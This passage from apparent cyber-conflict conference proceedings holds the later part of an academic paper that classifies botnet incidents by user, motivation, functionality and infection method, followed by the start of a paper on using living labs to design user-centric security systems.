Groups shall cover all forms of collaborative and coordinated, but still loose, groups of individuals. It does not include groups formed on the basis of a legal person (e.g. a company), and as such leaves each individual responsible for their own actions; persons with different roles might face different consequences, though. This covers examples where a group of persons acted as a whole and out of internal motivation, as seen to a certain extent in the Operation Payback incident with regard to the role of Anonymous (Panda Security 2010) and the later founded AnonOps (AnonOps 2010). Groups also include organized crime organizations which do not use a legal body as a facade.
Organizations, in contrast to groups, are mainly defined by the legal person representing them. Besides the individuals within the organization (and their personal liability), there is a legal person under private law which can be held responsible. This covers all companies using botnets for, e.g., getting an (economic) advantage over another party, and to a limited extent organized crime, if it also uses a legal person for conducting at least parts of its operations. This class shall also include organizations established under international private law.
State Actors are the last type of users this taxonomy defines, and shall cover all organizations established under public national or international law. These include especially parts of the executive power of a state, like police, military or intelligence services.
3.2 Motivations for botnet usage

Botnets are powerful and flexible tools providing their user with a wide variety of functionality. While many different features of the botnet can be used at the same time, they are connected by the single motivation of the perpetrator at the time of usage. The second attribute provides the following broad classes of motivation behind botnet usage, which are similar to the Motivations and Attackers identified by (Weaver et al. 2003).
Education & Research covers all activities done for the sake of getting familiar with botnets, regardless of whether one is interested in using, developing, analyzing or defending against them. The key attribute of this taxon is the absence of a clear target, i.e. no intention to violate somebody's rights or property.

Seeking Financial Gain is probably the most common motivation for using botnets nowadays. This includes most cases of information theft, like stealing bank or credit card information or license keys, as this information will be monetized almost immediately by either using or selling it.
Espionage covers all cases where stolen information is not intended to be turned into money directly, or at all. Instead, the gathered knowledge is used to influence one's own decisions or the relationship between parties, or to enhance one's own situational awareness. This taxon is independent of the User of the Botnet as defined in the previous section, and as such covers e.g. cases of state spying or industrial espionage.
Manipulation by Sending Data is an umbrella class for all cases of botnet usage where an outward-directed data flow (from the viewpoint of the infected machine) is used a) to express one's own opinion on something, or b) to manipulate somebody else's opinion by sending wrong or misleading information. The first sub-category covers cases like hacktivism (Denning 2001; Ottis 2008), where groups of persons use botnets to attack others, e.g. by disturbing the normal functionality of provided services, to support their political message. The second sub-category covers cases of propaganda or the manipulation of services or of the outcomes of polls or voting, leading to a wrong final picture for others (Temmingh & Geers 2009a).
Manipulation by Filtering Data, on the other hand, shall cover all cases where denying access to information is the main reason for the botnet usage. This covers cases of censorship (see e.g. the Belarus case in Pavlyuchenko 2009), information blockades or redirection.
Botnets can be used as an instrument to Project Power in cyber space. To adapt Clausewitz freely, botnets can be used as a tool to influence another party's behaviour or policy after non-violent options are exhausted. This shall include, but not be limited to, cases where botnets became part of military operations (e.g. the information operation against Georgia-friendly news portals and governmental websites described in Nazario 2009), or could be used to damage another's economy (Lemay et al. 2010). We also include cases of sabotage (as in the case of Stuxnet, see Falliere et al. 2010) and blackmail (Sophos 2006) here. It needs to be stressed that this taxon is independent of the user of the botnet and as such ranges from individuals to state actors.
To Evade Attribution is another reason one might consider using botnets. The mostly global distribution of botnets allows the user to let the victim believe that someone else was behind the cyber attack. This can even be extended to the intention to run a false-flag operation. While botnets are not the only possible way to reach this goal, they are certainly a convenient one. As transnational cooperation in fighting cyber crime is still not developed globally, and not all nation states enjoy friendly relationships, disguising one's real location and identity can be a reason to use botnets. Another scenario included here is the (massive, distributed) acquisition of resources. Here the sheer number of zombies in the botnet, and with it the combined CPU processing power or storage capacity, is used to set up a distributed service in which no single node has enough knowledge that, even if that node is forensically analyzed, the service as a whole would be endangered or compromised.
3.3 Functionality
The functionality provided by a botnet is highly dependent on the developer of the botnet and can vary quite significantly between botnets. A fundamental feature of all botnets is the ability to remotely control computers and the ability to send files to them, e.g. for updating the bot client later on. On top of this, a variety of different functions has been developed and became part of many botnets, while not all botnets share the same features. Because of the common update feature, enhancing a botnet's capabilities later on is most often possible.
The third attribute of this taxonomy provides a set of generic features botnets might have. It combines features already seen in botnets over the past years with some new ones which the authors believe are reasonable to consider, as they might be seen in the near future. While this list has been prepared with care, based among others on (Weaver et al. 2003; Bacher et al. 2005), it is not claimed to be complete. The future might show new functionality not thought of until now.
Denial of Service (DoS) is the ability to disrupt the normal functionality of the infected machine as a whole. This enables the botnet master to shut down or even damage the infected system, making a recovery at least difficult.
Distributed Denial of Service (DDoS) is a functionality whereby a large number of service requests are directed to a target system, exhausting its available resources, in particular its ability to answer desired requests. For these attacks, the number of botnet clients used is the main criterion for the success of the DDoS, while it is recognized that more sophisticated attack techniques might lower the number of bots necessary to attack the target.
Christian Czosseck and Karlis Podins
Information theft of data stored or processed on the infected machine, or of traffic passing or reaching it, is another commonly seen functionality of botnets (Klein et al. 2011). This includes, but is not limited to, the search for specific files, passwords or other sensitive data stored on or typed into the infected workstation, e.g. banking credentials.
Uploading data, as the opposite of information theft, enables the botnet owner to deliver any desired file onto the infected machine. A basic implementation of this functionality is most often a standard feature of botnets, as it is necessary to update the installed malware. Besides this, the installation of additional software, e.g. further spyware, advertisement add-ons, or Browser Helper Objects, is frequently seen (Bacher et al. 2005). On a bigger scale this could be used to implement a regional surveillance system (see e.g. the idea presented in Husted & Myers 2010).
But the botnet owner is not limited to this, as he can basically upload any file he wants to the infected machine, and as such could e.g. place compromising or illegal data. Another special case of this taxon is the use of the botnet as a launch platform for other malware, accelerating its spreading by orders of magnitude or enabling regionally targeted distribution of it, as in the case of Stuxnet (Falliere et al. 2010).
This also includes the manipulation of existing files on the infected system to change their intended functionality. It is e.g. not uncommon for malware to disable running AV software or to restrict access to AV websites (Porras et al. 2009).
Proxying is the ability to use the infected clients to execute actions on behalf of the botnet master without him being revealed directly. Known cases are spam campaigns, where the bots are tasked to send emails massively to a target group. Using a limited number of bots to form a proxy chain can provide functionality similar to anonymization services like the TOR network, where tracking traffic routes is close to impossible. Or they are used to hide the real location of some critical services, like phishing sites or C&C servers, by implementing fast-flux domains (Nazario & Holz 2008). Another, not often seen, way of using this functionality would be the manipulation of voting (Temmingh & Geers 2009b) or click-based (advertisement) services (Bacher et al. 2005).
Distributed resource clustering is a newly introduced function not commonly used so far, but the authors believe that there is room for botnet herders to explore this area more. It is understood that all the other mentioned functions also use resources of the infected machine to execute the mission they are tasked with. This taxon of botnet usage assumes that the botnet herder combines the available resources, namely CPU time or HDD space, to build a service like those known from the domain of clustered computing or cloud computing. The resources made available this way would enable him e.g. to conduct distributed calculations, which could be useful for password cracking, or to set up a distributed storage, where every member of the botnet holds part of the data the botnet herder wants to store. If designed well, he could store huge amounts of data, redundant and segmented, in the botnet without any single bot client having enough parts to reconstruct a complete picture.
3.4 Way of infection
Enforced Infection:
Most botnets behave like any other malware, trying to infect as many hosts as possible, spreading autonomously if ordered to do so. Computers are infected and join botnets without the knowledge or consent of the owner. Malware developers are actively developing and looking for new exploits to infect new hosts, and so far they are quite successful (Klein et al. 2011).
Voluntary Self-infection:
Besides the common way of infection mentioned above, there have been a number of cases where owners voluntarily infected their machines to join a botnet. By doing so they supported a certain (politically motivated) cause, e.g. the incidents in Estonia in 2007 and Operation Payback in 2010 (Ottis 2008; Panda Security 2010).
4. Application of the taxonomy
In order to test how well the taxonomy classifies events of botnet usage, we look at a selection of recent incidents involving botnets. These events are chosen to represent a wide variety of botnet uses; their order does not reflect any ranking of importance. In some cases, several closely related incidents are classified together as a group, because different events using the same bots happened at the same time. An overview is presented in Table 1.
4.1 Stuxnet
Although the number of Stuxnet-infected hosts was small and its spreading was highly targeted, the most basic feature of botnets, the existence of a command and control capability, supports considering Stuxnet as a botnet (Falliere et al. 2010).
While categorizing this incident using the proposed taxonomy, the lack of trustworthy, full information made the attribute Users of Botnets hard to decide. While there are many speculations on this, we decided to assume at least one state actor being involved. The Motivation is covered by the power projection taxon, including sabotage, which seems to be the most likely motivation behind this incident. Stuxnet spread by involuntary infection, and its manipulation of and damage to industrial systems represents a denial of service functionality.
4.2 GhostNet
There is no evidence on who the players behind GhostNet are. Speculations range from (groups of) individuals up to state actors. As such we leave the user as unknown. But the small number of infected hosts (around 1300) and the percentage of high-value targets (up to 30% of infected hosts belonged to ministries of foreign affairs, embassies, international organizations etc.) indicate that the motivation was espionage against the pro-Tibet community. In order to do that, GhostNet was performing information theft from involuntarily infected machines (Deibert et al. 2009).
4.3 Operation Payback
Operation Payback was launched by a group of WikiLeaks supporters after multiple financial service providers stopped their services for WikiLeaks following the latest massive disclosure of classified US documents. The attacks were carried out using an open source network attack application called Low Orbit Ion Cannon. The attacks were coordinated using internet forums, Twitter and some C&C servers (Pras et al. 2010; Panda Security 2010; Correll 2010). According to our taxonomy, we classify the motivation as projecting power. The functionality of choice was DDoS attacks, and participation in this event was voluntary.
4.4 Help-Israel-Win
A group of pro-Israel activists, in their campaign against Hamas (power projection), set up a website also hosting software for download, to voluntarily join a botnet under the control of this group. Based on the information released by this group, they use the botnet to conduct DDoS attacks against pro-Palestinian web sites. To what extent they were successful, or whether they have launched any attacks at all, is still unclear (Shachtman 2009).
4.5 Conficker
Until now it is not publicly known who the developers and users of Conficker are. But the analysis of this malware and the speed with which this botnet adapted to countermeasures lets us assume that at least a group of persons is behind Conficker. The lack of any executed functionality besides file transfer to update the infected clients with the latest versions of Conficker allows the assumption that Conficker was mainly developed as a proof-of-concept and as such falls under Education & Research. Conficker infected its hosts involuntarily (Porras et al. 2009).
4.6 Mariposa
The Mariposa botnet, claimed to be one of the world's largest botnets ever, was developed and used by an international group of criminals for financial gain. They harvested banking credentials and credit card data (information theft) as well as used it for launching DDoS attacks. The victims were all infected involuntarily (McMillan 2010).
4.7 Belarus censorship
The Belarus state has a long history of enforcing Internet censorship on its citizens with regard to regime-critical information. Charter '97, a leading venue for public discussions in Belarus, regularly suffered state-sponsored cyber attacks against its website. In April 2008 a DDoS attack took it down to block state-independent news coverage of protests ongoing in the streets (manipulation by filtering data).
While Belarus officials denied official involvement, it is assumed that they were not actively countering the attacks. As such we classify this incident as done by a state actor. As the botnets used are unknown, the way of infection cannot be decided upon (Pavlyuchenko 2009).
Table 1: Overview of selected incidents and their classification

Example             User          Motivation           Functionality            Way of infection
Stuxnet             State Actor   Power Projection     Denial of Service        Involuntary
GhostNet            Unknown       Espionage            Information theft        Involuntary
Operation Payback   Group         Power projection     DDoS                     Voluntary
Israeli             Group         Power Projection     DDoS                     Voluntary
Conficker           Group         Education&Research   none                     Involuntary
Mariposa            Group         Financial Gain       Information Theft/DDoS   Involuntary
5. Conclusions
Easy access to botnets makes them available to all kinds of parties, not all of them particularly interested in monetary revenue, but increasingly pursuing political and military aims. With this, the common interpretation of monetarily motivated cyber crime being the main driver behind the usage of botnets does not sufficiently cover the current situation anymore.
We have presented a usage-centric taxonomy which provides a structured approach to compare different botnet incidents.
Two distinct applications of the proposed taxonomy were considered. The first is to analyze and categorize past and current botnet incidents. The applicability of the taxonomy has been shown on a selection of recent botnet incidents. The performance of the usage-centric taxonomy in classifying the selected incidents gives hope that the proposed taxonomy will be helpful in understanding other botnet incidents. This might motivate structuring countermeasures in a similar way and developing an instrument to organize and select responses on different levels.
Another application is to help thinking about novel ways of using botnets. By pre-selecting some attributes, the taxonomy allows for a structured and systematic search through the remaining attributes. By this, the taxonomy might find interesting and novel botnet-related threats and lead to improvements of existing or forthcoming risk assessments, and as such helps to improve cyber security from the institutional up to the national level.
This taxonomy was designed by defining generic taxa, able to match even future incidents, and is believed to cover most incidents seen so far. Nevertheless the future might show the need to amend the list of taxa, especially that of Functionalities applied.
Disclaimer
The opinions expressed here are those of the authors and should not be considered as the official policy of the Cooperative Cyber Defence Centre of Excellence or NATO.
References
AnonOps, 2010. Welcome to AnonOps Network | Anonymous Operations (AnonOps), HACKERS ON STEROIDS. Available at: http://www.anonops.ru/ [Accessed February 9, 2011].
Asosheh, A. & Ramezani, N., 2008. A comprehensive taxonomy of DDoS attacks and defense mechanism applying in a smart classification. WSEAS Transactions on Communications, 7(4), pp. 281-290.
Bacher, P. et al., 2005. Know your enemy: Tracking botnets. The Honeynet Project.
Barford, P. & Yegneswaran, V., 2007. An inside look at botnets. Malware Detection.
Champagne, D. & Lee, R., 2006. Scope of DDoS countermeasures: taxonomy of proposed solutions and design goals for real-world deployment. on Systems and Information Security (SSI).
Correll, S.-P., 2010. 'Tis the Season of DDoS - WikiLeaks Edition | PandaLabs Blog. PandaLabs. Available at: http://pandalabs.pandasecurity.com/tis-the-season-of-ddos-wikileaks-editio/ [Accessed February 9, 2011].
Deibert, R. et al., 2009. Tracking GhostNet: Investigating a Cyber Espionage Network. Information Warfare Monitor, Munk Centre, JR02-2009, March 29.
Denning, D.E., 2001. Activism, hacktivism, and cyberterrorism: the internet as a tool for influencing foreign policy. In Networks and netwars: The future of terror, crime, and militancy, pp. 239-288.
Falliere, N., Murchu, L.O. & Chien, E., 2010. W32.Stuxnet Dossier. Symantec Security Response, 3(November), pp. 1-64.
Hansman, S. & Hunt, R., 2005. A taxonomy of network and computer attacks. Computers & Security, 24(1), pp. 31-43.
Holz, T. et al., 2008. Measuring and detecting fast-flux service networks. In Symposium on Network and Distributed System Security. Citeseer.
Husted, N. & Myers, S., 2010. Mobile location tracking in metro areas: malnets and others. In Proceedings of the 17th ACM conference on Computer and communications security. ACM, pp. 85-96.
Killourhy, K.S., Maxion, R.A. & Tan, K.M.C., 2004. A defense-centric taxonomy based on attack manifestations. IEEE.
Klein, G., Leder, F. & Czosseck, C., 2011. On the Arms Race Around Botnets - Setting Up and Taking Down Botnets. In C. Czosseck & K. Podins, eds. 2011 3rd International Conference on Cyber Conflicts. Tallinn: CCD COE Publications (in press).
Lemay, A., Fernandez, J.M. & Knight, S., 2010. Pinprick attacks, a lesser included case? In C. Czosseck & K. Podins, eds. Conference on Cyber Conflict Proceedings. Tallinn: CCD COE Publications, pp. 183-194.
Lippmann, R.P. et al., 1998. Evaluating intrusion detection systems: the 1998 DARPA off-line intrusion detection evaluation. Proceedings DARPA Information Survivability Conference and Exposition, DISCEX 00, pp. 12-26.
McMillan, R., 2010. Spanish police take down massive Mariposa botnet. IDG News. Available at: http://www.pcworld.com/businesscenter/article/190634/spanish_police_take_down_massive_mariposa_botnet.html [Accessed February 9, 2011].
Mills, E., 2009. "Golden Cash" network - rent a botnet - ZDNet. CNET News. Available at: http://www.zdnet.com/news/golden-cash-network-rent-a-botnet/312957 [Accessed February 9, 2011].
Mirkovic, J. & Reiher, P., 2004. A taxonomy of DDoS attack and DDoS defense mechanisms. ACM SIGCOMM Computer Communication Review, 34(2), p. 39.
Nazario, J., 2009. Politically Motivated Denial of Service Attacks. In C. Czosseck & K. Geers, eds. The Virtual Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press, p. 2010-05.
Nazario, J. & Holz, T., 2008. As the net churns: Fast-flux botnet observations. In Malicious and Unwanted Software, 2008. MALWARE 2008. 3rd International Conference on. IEEE, pp. 24-31.
Ottis, R., 2008. Analysis of the 2007 Cyber Attacks Against Estonia from the Information Warfare Perspective. In Proceedings of the 7th European Conference on Information Warfare. Academic Conferences Limited, p. 163.
Panda Security, 2010. The Anonymous cyber-activist group, responsible for the attack on Spain's SGAE and other copyright societies, launches further attacks in defense of Wikileaks founder | Press Panda Security. Panda Security. Available at: http://press.pandasecurity.com/news/the-anonymous-cyber-activist-group-responsible-forthe-attack-on-spain’s-sgae-and-other-copyright-societies-launches-further-attacks-in-defense-of-wikileaksfounder/ [Accessed February 9, 2011].
Pavlyuchenko, F., 2009. Belarus in the Context of European Cyber Security. In C. Czosseck & K. Geers, eds. The Virtual Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press.
Porras, P., Saidi, H. & Vinod, Y., 2009. An Analysis of Conficker.
Pras, A. et al., 2010. Attacks by "Anonymous" WikiLeaks Proponents not Anonymous.
Schwartz, M.J., 2010. Pssst...Want To Rent A Botnet? - Darkreading. Dark Reading. Available at: http://www.darkreading.com/security/vulnerabilities/225200525/index.html [Accessed February 9, 2011].
Shachtman, N., 2009. Wage cyberwar against Hamas, surrender your PC. Wired. Available at: http://www.wired.com/dangerroom/2009/01/israel-dns-hack/ [Accessed February 11, 2011].
Sophos, 2006. Online Russian blackmail gang jailed for extorting $4m from gambling websites. Sophos.com. Available at: http://www.sophos.com/pressoffice/news/articles/2006/10/extort-ddos-blackmail.html [Accessed February 9, 2011].
Temmingh, R. & Geers, K., 2009a. Virtual Plots, Real Revolution. In C. Czosseck & K. Geers, eds. The Virtual Battlefield: Perspectives on Cyber Warfare. IOS Press, pp. 294-302.
Temmingh, R. & Geers, K., 2009b. Virtual Plots, Real Revolution. In C. Czosseck & K. Geers, eds. The Virtual Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press, pp. 294-302.
Weaver, N. et al., 2003. A taxonomy of computer worms. In Proceedings of the 2003 ACM workshop on Rapid Malcode. ACM, pp. 11-18.
Wood, A. & Stankovic, J., 2004. A taxonomy for denial-of-service attacks in wireless sensor networks. of Sensor Networks: Compact Wireless and.
Wun, A., Cheung, A. & Jacobsen, H.-A., 2007. A taxonomy for denial of service attacks in content-based publish/subscribe systems. New York, New York, USA: ACM Press.
User-Centric Information Security Systems - A Living Lab Approach
Moses Dlamini 1,2, Jan Eloff 1,2, Marek Zielinski 1,2, Jason Chuang 1 and Danie Smit 1
1 SAP Research/Meraka UTD, Pretoria, South Africa
2 University of Pretoria, South Africa
moses.dlamini@sap.com
jan.eloff@sap.com
marek.zielinski@sap.com
jason.chuang@sap.com
danie.smit@sap.com
Abstract: For the past forty years, security experts have spent billions of dollars trying to improve security technologies. However, security systems are continually failing to protect end users' information systems and their information. Security experts claim that the end users are the weakest link in the security chain, and the end users claim that the security features of systems are complex and full of gaping security vulnerabilities, and that they are an overhead that hinders their work. There is clearly a disjoint here. This paper introduces the concept of a Living Lab to help improve the current status and provide user-centric security systems.
Keywords: information security system, living lab, user-centric security
1. Introduction
All along, information security experts have spent billions of dollars doing their best to strengthen security tools and technologies. This is reflected in the recent advances in access control policies, quantum cryptography, state of the art host-based and perimeter firewalls, 360-degree anti-viruses, anti-spyware, spam filters, real-time intrusion detection and prevention systems, multi-factor authentication, and other information security controls. However, the problem of information insecurity still persists, and with increasing consequences. Even with the high regulatory compliance penalties for breached organisations, information security mechanisms still fail to protect the end user information systems and the information they hold. This is an indication that a technological focus alone cannot solve the problems of information insecurity (Miller 2010 and Dlamini 2010).
Having done their level best in strengthening the technologies, security experts are now pointing fingers at the end users, claiming they are "inherently insecure" (Sasse, Brostoff & Weirich 2001). End users are incapable of using security tools and they have unacceptably slow speed and accuracy when dealing with security operations (Smith 2003). Hence, end users are now commonly referred to as the "weakest link in the information security chain" (Izadi et al. 2009; Asher, Aumasson & Phan 2009; Patrick, Long & Flinn 2003; Sasse et al. 2001 and Schneier 2000). From the security experts' point of view, the insecurity problems start from the end users' interaction with the security systems.
In defence against these assertions, usability experts argue that the end users are not the enemy in the security chain (Adams and Sasse 1999). Smith (2003) argues that the IT infrastructure is continually full of gaping security holes and vulnerabilities. It is only a matter of time before attackers find and exploit these holes and vulnerabilities, and quite often they are the first ones to notice them. In essence, security breaches are inevitable given the current security mechanisms. Furthermore, Balfanz et al. (2004) argue that end users struggle to understand information security systems because they are complex. With the complexity of the systems, end users end up misunderstanding the security implications of their actions. Hence, they quite often misconfigure, disable, circumvent or completely ignore security systems to get their work done. This is why information security systems are normally seen as a necessary evil or an overhead that hinders productivity (Dlamini, Eloff & Eloff 2009 and Adams & Sasse 1999).
1.1 Problem statement
Security experts continue to design and develop security systems in closed laboratories following a threat model. With the "claim" of understanding the changing security threat landscape using the threat model, security experts design and develop new systems to counter new security threats. These systems are then tested in the artificial laboratories and, after passing the tests, they get pushed to the end users (i.e. technology dumping) with the hope that they will work as intended.
Although these systems might work well in the laboratories, quite often they fail or become less effective in the real world. This is mainly because the traditional technology-centric way of developing systems is more concerned with the functional features of the systems. It does not take into consideration the end user requirements, problems and environment, yet this is crucial if such systems are meant to protect the end users. This approach renders most of the existing security systems inappropriate for the end users. Faced with the problem of inappropriate systems, end users spend a lot of time and money customizing and tailoring the systems to better address their specific needs. Hence, there exists a surging need to understand the end users’ requirements, needs, cultural diversity, economic and social issues, and the environment they operate in. These must then be incorporated in the design and development of user-centric information security systems. The end users must be actively involved at all stages of the development.
This paper is aimed at answering the question of how we can incorporate and actively engage end users in the design and development of information security systems. This paper proposes the use of a Living Lab (LL) concept. This approach can help security experts to actively engage with end users early enough to deliver user-centric systems that are driven by and best meet the user requirements.
The rest of the paper is structured as follows: Section 2 defines the concept of a LL. Section 3 presents related work. Section 4 is a discussion of how we used the Overture LL to achieve a user-centric information security system. Section 5 concludes the paper and highlights the future direction of this research.
2. Definition of a living lab
There are a number of definitions in the literature that attempt to define a Living Lab (LL). However, there is still no widely accepted standard definition. A move towards an accepted standard definition requires a study of the already available definitions. It is for this reason that we outline some of the definitions in an effort to find possible common ground for all. Below, we discuss some of the definitions and later integrate them, as a move towards a standardized definition.
A living lab is defined as a user-driven open design ecosystem in real-life settings which is based on a business (private)-citizens (public)-government partnership that enables and empowers end users to take an active role in a fully integrated co-innovative design and development of systems (Santoro & Conte 2009). This is achieved by bringing end users early into the development process to identify new and emerging user patterns and behaviour. Santoro and Conte (2009) argue that this also bridges the gap between technology development and its uptake by all the stakeholders of the value chain. It also allows for early assessment of the socio-economic implications of the new technology by demonstrating the validity of its innovation.
Schumacher (2008) defines a LL as a Public-Private-Civic Partnership in which all stakeholders (including end users) co-design and co-create new products, services and technologies in real-life environments. This means that end users and all other stakeholders work together, and each one of them takes an active role in creating new systems in a live or virtual environment.
Van der Walt et al. (2009) define a LL as a new way for end users to actively take part in a real-time experimental environment and, together with system developers, learn to create community-driven innovative solutions that best meet the users’ pain points and solve current, real-world problems in a unique way. In this definition, a LL provides users with a real-time platform to experiment with solutions in an effort to tailor them to their specific needs. The work of van der Walt et al. (2009) cites a number of definitions from other researchers. The one that appears most comprehensive therein defines a LL as neither a traditional research lab nor a testbed, but as an innovative platform that brings together and engages all stakeholders at the early stage of the innovation process to experiment with breakthrough concepts and their potential value for both society and end users, leading to breakthrough innovations (van der Walt et al. 2009).
Folstad (2008) defines a LL as an environment for engaging end users in the innovation and development process as a way of meeting the ICT innovation challenges. This definition does not say anything about the type of environment, i.e. whether it is a testing or an experimental platform.
From the above definitions we deduce that a LL is characterised by:
User-centric co-design and co-development
Active end user involvement
Development in a real-life setting
End user innovation as the driving force
Capturing the exact user needs and context
Involving users from conceptualization until deployment
Adding value to the end users and society at large.
For the purposes of this paper, a Living Lab is defined as user-centric co-design and co-development in a real-life environment, stimulated by open co-innovation, which is achieved through the participation of a multi-stakeholder Public-Private-Civic partnership that places the end users at the centre and considers them active role players from the early stages of conceptualization up to deployment, in an effort to develop innovative end user-driven solutions that seek to add value to the end users and society at large.
This definition highlights the rising power of end users and the rapidly increasing pace of security product innovation that targets specific end user pain points to build customer loyalty, facilitate entry into new market segments and increase customer satisfaction (Sinha & Sprague 2008). The increasing end user security demands, aided by the intensifying business competition, have forced security vendors to gain a deep understanding of the end users’ needs and to develop an intimate relationship with them (Sinha & Sprague 2008). In today’s business environment, only the security products that meet and exceed end users’ expectations will thrive. Below, we briefly discuss some of the related work that has led to the current state of affairs.
3. Related work
The relationship between end users and security experts is failing. This is because end users do not understand security systems and perceive them as laborious and unnecessary overheads. Security experts, on the other hand, do not understand the end users’ needs and environment. To bridge the gap and help facilitate a good relationship between end users and security system designers, several researchers have explored Usable Security (Adams & Sasse 1999; Balfanz et al. 2004; Payne & Edwards 2008) and User-centric Security (Zurko & Simon 1997; Holmstrom 1999; Zurko 2005; Nohlberg & Bäckström 2007; Vidyaraman 2008; Jaferian et al. 2009; Faily & Flechais 2010), among others.
3.1 Usable security
Security experts have joined hands with usability experts to establish usable security. This came after security and usability had been considered a trade-off, meaning that to get more of one you would have to sacrifice some of the other. Usable security strives to find the right balance between security and usability without really compromising on either (Braz, Seffah & M’Raihi 2007; Ben-Asher et al. 2009; Ben-Asher et al. 2010; Emil 2010). This approach has resulted in easy-to-use security systems. However, a need still exists to go a step further and design systems that address end user needs and understand the context within which they operate. This has led to research on user-centred security, which we discuss below.
3.2 User-centric security
Even though usable security addresses the issue of ease of use, a need still exists for researchers to solve the issue of security systems that go further to address specific end user pain points. This change has brought about the concept of user-centred security (Zurko 2005; Jaferian et al. 2009; Faily & Flechais 2010), a trend that has grown with the proliferation of security products on the security markets. It has not been clear how to achieve user-centred security, and this has led to our proposal to use a Living Lab (LL) approach, which we discuss below.
3.3 Living lab
Folstad (2008) argues that the concept of Living Labs started in the nineties. Back then, it described cooperative partnerships and live field trials (Folstad 2008). The concept of LLs is relatively new in the ICT domain. However, today there is a growing interest in LLs. This interest is reflected in the European Network of Living Labs (ENoLL), which comprises 129 LLs (Schaffers et al. 2009). This is the biggest network of LLs in the world and it continues to grow. However, according to the authors, none of these initiatives has tried to apply LLs to improving security systems.
3.4 Beyond the current state of affairs
The current user-centric approach has only focused on incorporating user requirements in the development lifecycle of security systems without really engaging the end users as active stakeholders. It is therefore crucial that security experts engage end users as active role players in the development of innovative information security systems from conceptualization up to deployment. This is important in order to achieve what Rahaman and Sasse (2010) call the concept of a “lived experience”. They define this as a deep understanding of the relationship between end users and technology in terms of their actions and how they interact. This concept increases the scope of user-centred security beyond the traditional usability concept of ease of use (Rahaman & Sasse 2010). Therein, it is argued that there is a big risk that terms such as “usable” and “user-centric” security remain a statement of intent and might never be fulfilled (Rahaman & Sasse 2010). This is because, most of the time, the context of the end users and the impact of security systems on their “lived experience” are not considered. To advance beyond the current state of affairs in usable and user-centred security systems, this paper proposes a LL approach aimed at bringing in the “lived experience”.
According to the authors, there is still no work that has tried to use a “lived experience” to go beyond usable and user-centred security using a LL approach. This is the point of departure for this paper. Below we discuss how to use a LL approach to create user-centric security systems, based on the Overture LL project.
4. Achieving a user-centric information security system based on the Overture LL
This section begins with a brief description of the Overture LL. It goes on to discuss how the Overture LL helped achieve user-centric security. The concepts of “secure by default” and “ground up” security are discussed.
4.1 Overture LL
The Overture LL was initiated as part of the Overture project of SAP Research Pretoria with the mandate “... to demonstrate socio-economic feasibility of a mobile business solution for the very small enterprises in Emerging Economies”. Project Overture was established to provide a very small enterprise (VSE) in an emerging economy (EE), such as South Africa, with a solution to conduct its day-to-day business activities on a mobile phone. VSEs in this context are enterprises that consist of fewer than 20 employees and often do not adhere to or comply with regulatory mandates. VSEs lack financial resources and ICT infrastructure. They exhibit high risk and uncertainty in terms of profit, growth and success.
The Overture LL was therefore established to support the iterative design and development of a “Mobile Business Services Platform” prototype for the VSEs. The prototype was tried and tested in a real-world environment with real end users chosen from the plumbing industry as the selected vertical sector. The plumbers, along with other stakeholders such as SAP Research Pretoria (the technology provider), CashBuild and PlumbLink (plumbing suppliers), the Institute of Plumbers of South Africa, government agencies working with VSEs and a telco intermediary that hosts the prototype, have been actively involved in the whole process from the beginning of the project to the end, providing a lived experience.
The plumbers provided their direct or indirect input (through feedback on their evaluation of the system as they interacted with it on a day-to-day basis) at all stages of design and development of the prototype. Their inputs were quickly put to the test and the necessary alterations made; those that were not feasible were discarded with a clear explanation, and the feasible ones were incorporated in the next iteration. For example, at the beginning of the exercise, all the users of the system were classified as end users. But as the plumbers, project managers, financial controllers and administrators began to work with the system, a concern was raised about the principles of “separation of duties”, “need to know” and the classification of information, which was then implemented in the next version. This gave our end users a strong sense of belonging and ownership – a key success factor for acceptance and adoption of the final solution. Moreover, this provided both parties with a guarantee that the final product will address the exact needs of the target niche market and that the end users will be happy with the product that they helped build – a win-win situation indeed.
4.2 Operations of the Overture LL
The diagram below shows how the Overture LL approach incorporated the end user requirements, inputs and context through each step of the security development lifecycle (SDL) (Lipner & Howard 2005).
Figure 1: A Living Lab based user-centric information security design process
The design process started with all stakeholders drafting the mandate and a clear scope for the project. This was followed by the requirements analysis process, which included a threat analysis, risk analysis, usability requirements and vulnerability analysis. The threat analysis was conducted to get a comprehensive view of the potential threats to the proposed system. The vulnerability analysis, which was conducted after the first iteration, examined the potential security holes within the system. The risk analysis built on the threat and vulnerability analyses by identifying the risk associated with the threats and vulnerabilities. The usability requirements were developed by our usability experts to provide the system with ease of use and help remove the complexity that is normally associated with information security systems.
From this process, the system requirements as well as the end user requirements were documented to provide inputs to the specification document. We then developed a conceptual model on a whiteboard; this was put into design and later sent to the development team. The system was developed and then tested by the end users. The end users’ feedback helped us to refine our scope and mandate for the second iteration; all the identified vulnerabilities were patched and the system went through the same processes again, remaining open to the end users’ inputs at all times until everyone was happy with the final product.
The Overture LL has really provided the end users with a platform to actively provide their direct or indirect input into the system, whether through their requirements, their inputs (in the form of feedback and comments) or their context (in terms of the operating conditions and environment). It puts the end users at the centre of design and development. Taking this approach facilitates the implementation of a truly user-centric approach to security systems. Below are some of the concepts that were further implemented in the process of the system development.
4.3 Secure by default
A lesson learnt in the Overture LL was that, even in a LL environment, end users still need to be sure that the system in design and development is secure, dependable and reliable. It is very important that all the necessary security measures are put in place, especially at the design, development and pilot phase. This is because it is at this phase that the end users get to have hands-on experience with the system. If their first impression is that the system is not secure enough, they would easily be discouraged from using it. From the outset, we assured them and made them aware that the system is secure and adequately protects their privacy and information assets.
All systems, even those which are under development or at the pilot phase, should be made “secure by default”, meaning that their default security configuration settings must be the most secure settings possible (Miller 2004; Lipner & Howard 2005). Quite often, when system settings are set to the most secure state, they work only for the selected options that they are meant to work for and nothing more. They run with the least necessary privileges, and everything else that is unnecessary is disabled or blocked. We carefully analyzed the roles and the day-to-day work of the end users and, based on that, determined their least privileges.
Note also that the “secure by default” approach must be taken with extra caution to avoid security hindering end users from executing their daily duties. In most cases, the most secure configuration settings are not user-friendly settings. Most end users will have difficulties in working with them, which might cause them to circumvent the security systems that are meant to protect them from threats. Consider, for example, an end user suggesting that all communications must be encrypted and anti-virus be installed on all the mobile phones. This would consume a lot of processing power, which might make the system slow and therefore delay the end users in executing their day-to-day duties. Even though this would have provided us with a highly secure system, it would have been overkill and hence it was excluded.
